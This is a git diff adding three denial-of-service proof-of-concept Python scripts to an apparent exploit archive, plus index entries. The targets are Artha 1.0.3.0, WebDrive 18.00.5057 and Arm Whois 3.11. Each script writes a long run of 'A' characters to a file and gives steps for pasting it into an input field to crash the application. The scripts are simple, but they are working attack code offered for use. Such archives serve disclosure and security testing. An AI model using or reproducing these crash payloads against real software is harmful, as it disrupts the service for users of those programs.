diff --git a/exploits/windows_x86-64/dos/45760.py b/exploits/windows_x86-64/dos/45760.py new file mode 100755 index 000000000..3b5e83c22 --- /dev/null +++ b/exploits/windows_x86-64/dos/45760.py @@ -0,0 +1,28 @@ +# Exploit Title: Artha The Open Thesaurus 1.0.3.0 - Denial of Service (PoC) +# Dork: N/A +# Date: 2018-11-01 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://artha.sourceforge.net +# Software Link: https://netcologne.dl.sourceforge.net/project/artha/artha/1.0.3/artha_1.0.3.0.exe +# Version: 1.0.3.0 +# Category: Dos +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# Query / Search + +#!/usr/bin/python + +buffer = "A" * 256 + +payload = buffer +try: + f=open("exp.txt","w") + print "[+] Creating %s bytes evil payload." %len(payload) + f.write(payload) + f.close() + print "[+] File created!" +except: + print "File cannot be created." \ No newline at end of file diff --git a/exploits/windows_x86-64/dos/45761.py b/exploits/windows_x86-64/dos/45761.py new file mode 100755 index 000000000..9136d78f4 --- /dev/null +++ b/exploits/windows_x86-64/dos/45761.py @@ -0,0 +1,25 @@ +#Exploit Title: WebDrive 18.00.5057 - Denial of Service (PoC) +#Discovery by: Victor Mondragón +#Discovery Date: 2018-10-31 +#Vendor Homepage: https://webdrive.com/ +#Software Link: https://webdrive.com/download/ +#Tested Version: 18.00.5057 +#Tested on: Windows 10 Single Language x64 + +#Steps to produce the crash: +#1.- Run python code: WebDrive_18.00.5057.py +#2.- Open string.txt and copy content to clipboard +#2.- Open WebDrive +#3.- Select "New" +#4.- Select "Secure WebDAV" and click on "Siguiente" +#6.- Select "Url / Address" and Put "1.1.1.1" +#7.- Select "Username" and Paste ClipBoard +#8.- Select "Password" and Put "1234" +#9.- Click on "Test Connection" +#10.- Crashed + +cod = "\x41" * 5000 + +f = open('string.txt', 'w') +f.write(cod) +f.close() \ No newline at end of file diff --git a/exploits/windows_x86/dos/45762.py b/exploits/windows_x86/dos/45762.py new file mode 100755 index 000000000..6d09c6d09 --- /dev/null +++ b/exploits/windows_x86/dos/45762.py @@ -0,0 +1,20 @@ +# Exploit Title: Arm Whois 3.11 - Denial of Service (PoC) +# Date: 2018-10-31 +# Exploit Author: Yair Rodríguez Aparicio +# Vendor Homepage: http://www.armcode.com/ +# Software Link: http://www.armcode.com/downloads/arm-whois.exe +# Version: 3.11 +# Tested on: Windows XP Profesional Español SP3 x86 + +# Steps to Produce the Crash: +# 1.- Run python code : python whois.py +# 2.- Open text.txt and copy content to clipboard +# 3.- Open whois.exe +# 4.- Paste clipboard on "IP address or domain" +# 5.- click on "Retrieves IP-adress info" +# 6.- Crashed! + +buffer = "\x41" * 700 +f = open("text.txt", "w") +f.write(buffer) +f.close() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 74d0c71c5..dc9381b99 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6169,6 +6169,9 @@ id,file,description,date,author,type,platform,port 45749,exploits/windows/dos/45749.py,"QNAP NetBak Replicator 4.5.6.0607 - Denial of Service (PoC)",2018-10-30,"Yair Rodríguez Aparicio",dos,windows, 45750,exploits/linux/dos/45750.txt,"SIPp 3.3.990 - Local Buffer Overflow (PoC)",2018-10-30,"Nawaf Alkeraithe",dos,linux, 45759,exploits/windows_x86-64/dos/45759.py,"SmartFTP Client 9.0.2615.0 - Denial of Service (PoC)",2018-10-31,"Victor Mondragón",dos,windows_x86-64, +45760,exploits/windows_x86-64/dos/45760.py,"Artha The Open Thesaurus 1.0.3.0 - Denial of Service (PoC)",2018-11-01,"Ihsan Sencan",dos,windows_x86-64, +45761,exploits/windows_x86-64/dos/45761.py,"WebDrive 18.00.5057 - Denial of Service (PoC)",2018-11-01,"Victor Mondragón",dos,windows_x86-64, +45762,exploits/windows_x86/dos/45762.py,"Arm Whois 3.11 - Denial of Service (PoC)",2018-11-01,"Yair Rodríguez Aparicio",dos,windows_x86, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,